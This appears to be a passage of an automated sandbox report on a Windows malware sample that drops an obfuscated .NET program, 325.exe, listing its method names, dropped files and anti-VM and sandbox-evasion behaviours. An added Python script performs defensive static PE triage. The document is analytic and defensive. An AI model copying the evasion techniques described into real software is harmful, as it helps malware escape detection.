Source: 325.exe.0.dr, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 325.exe.0.dr, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 325.exe.0.dr, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 325.exe.0.dr, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 325.exe.0.dr, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 325.exe.0.dr, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 325.exe.0.dr, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
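
The static findings in this section (entry point inside .MPRESS2, the non-standard .MPRESS1/.MPRESS2 names, the checksum mismatches, the 7.99 entropy of .MPRESS1, and the ER-to-EW rights change on the unpacked image) can all be reproduced on a file or a memory dump with standard-library Python. The script below is an added example and not part of the sandbox's tooling. It builds a constructed PE32+ image for its own self-test rather than touching the sample, the section-name sets are an assumption about what mainstream linkers emit, and the 7.0 entropy cut-off is a conventional threshold, not one the report states.

```python
"""Static PE triage: entry-point section, section names, per-section entropy,
W+X section rights and the header checksum. Standard library only, no pefile."""
import math
import struct
from collections import Counter

COMMON_SECTIONS = {  # assumed: names mainstream linkers emit; packers (MPRESS, UPX) use their own
    ".text", ".rdata", ".data", ".pdata", ".idata", ".edata", ".rsrc", ".reloc",
    ".bss", ".tls", ".CRT", ".gfids", ".00cfg", ".xdata", "CODE", "DATA", "BSS"}
CODE_SECTIONS = {".text", "CODE", ".code"}  # where an unpacked entry point normally sits
SCN_MEM_EXECUTE, SCN_MEM_WRITE = 0x20000000, 0x80000000

def shannon_entropy(buf):
    """Bits per byte: near 0 for padding, 8.0 for uniform (compressed/encrypted) data."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def pe_checksum(data, checksum_offset):
    """Loader-style CheckSum: fold the file as 32-bit words with end-around carry, skip the field, add the length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip, total = checksum_offset & ~3, 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data):
    """Minimal PE reader: entry point, CheckSum field and the section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # signature (4) + IMAGE_FILE_HEADER (20); CheckSum sits at opt + 0x40
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, *_, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize or rawsize, "chars": chars,
                         "raw": data[rawptr:rawptr + rawsize]})
    return {"entry": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 0x40)[0],
            "checksum_offset": opt + 0x40, "sections": sections}

def triage(data, entropy_threshold=7.0):
    """Static findings for one PE image (a file on disk or a dumped memory image)."""
    pe, findings = parse_pe(data), []
    holder = next((s for s in pe["sections"] if s["va"] <= pe["entry"] < s["va"] + s["vsize"]), None)
    if holder is None:
        findings.append(f"entry point 0x{pe['entry']:x} lies outside every section")
    elif holder["name"] not in CODE_SECTIONS:
        findings.append(f"entry point 0x{pe['entry']:x} lies in non-standard section {holder['name']}")
    for s in pe["sections"]:
        if s["name"] not in COMMON_SECTIONS:
            findings.append(f"non-standard section name {s['name']}")
        ent = shannon_entropy(s["raw"])
        if ent >= entropy_threshold:
            findings.append(f"high entropy in {s['name']}: {ent:.2f} (packed or encrypted)")
        if s["chars"] & SCN_MEM_EXECUTE and s["chars"] & SCN_MEM_WRITE:
            findings.append(f"{s['name']} is writable and executable")
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum"] == 0:
        findings.append("checksum field is zero (never set; usual for .NET builds, weak on its own)")
    elif computed != pe["checksum"]:
        findings.append(f"invalid checksum: header 0x{pe['checksum']:x}, computed 0x{computed:x}")
    return findings

def set_checksum(data):
    off = parse_pe(data)["checksum_offset"]  # what a release or signing build writes
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]

def build_sample_pe(sections, entry_rva, checksum=0):
    """Constructed minimal PE32+ for self-test, not a real binary; sections is a list of
    (name, rva, raw_bytes, IMAGE_SCN_* characteristics), file-aligned to 0x200."""
    file_align, sect_align, e_lfanew, opt_size = 0x200, 0x1000, 0x40, 240
    hdr_len = -(-(e_lfanew + 24 + opt_size + 40 * len(sections)) // file_align) * file_align
    table, blobs, raw_ptr, image_size = b"", b"", hdr_len, sect_align
    for name, rva, blob, chars in sections:
        raw_len = -(-len(blob) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(blob), rva,
                             raw_len, raw_ptr, 0, 0, 0, 0, chars)
        blobs, raw_ptr = blobs + blob.ljust(raw_len, b"\0"), raw_ptr + raw_len
        image_size = max(image_size, rva + -(-len(blob) // sect_align) * sect_align)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0, 0, 0, entry_rva, 0x1000,
                      0x140000000, sect_align, file_align, 6, 0, 0, 0, 6, 0, 0, image_size,
                      hdr_len, checksum, 3, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    return (dos + b"PE\0\0" + file_hdr + opt + b"\0" * 128 + table).ljust(hdr_len, b"\0") + blobs

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        print(path, *(triage(open(path, "rb").read()) or ["no static findings"]), sep="\n  ")
```

Two caveats when weighing the report's own lines: a checksum of 0, as on 325.exe, means the field was never populated, which is the norm for .NET compiler output and not an obfuscation signal by itself, so the script reports it separately and marks it weak; the checksum only becomes meaningful when it is non-zero and wrong, as on kS2dqbsDwD.exe, which is what a packer that rewrites the image without recomputing the field leaves behind. Likewise 0x140000000 is the default image base for 64-bit executables, so the "Image base > 0x60000000" line earlier in the report carries no weight on its own. The W+X check only fires on the in-memory dump (the report's .MPRESS1:EW), not on the file as shipped (.MPRESS1:ER), which is exactly the section-rights change the unpacking signature describes.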

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\325.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow, 0_2_000000014008B0A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 0_2_00000001400881E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop, 0_2_000000014008B280
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC, 0_2_000000014005E330
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus, 0_2_0000000140075850
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus, 0_2_0000000140075850
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked, 0_2_0000000140044A00
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect, 0_2_0000000140071A10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2BE0 IsIconic, 0_2_00000001400C2BE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140040D29 IsZoomed,IsIconic, 0_2_0000000140040D29
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect, 0_2_0000000140079D90
Source: C:\Users\user\AppData\Roaming\325.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 325.exe PID: 4796, type: MEMORY
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 440 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Window / User API: threadDelayed 7193 Jump to behavior
Is looking for software installed on the system
Source: C:\Users\user\AppData\Roaming\325.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es) 0_2_0000000140013FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru) 0_2_0000000140014380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es) 0_2_00000001400055F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh 0_2_000000014000DAA0
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0000000140087A90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose, 0_2_0000000140087B90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0000000140062320
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2390 FindFirstFileW, 0_2_00000001400C2390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D405
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D40F
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D419
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D423
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D44D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose, 0_2_000000014004D478
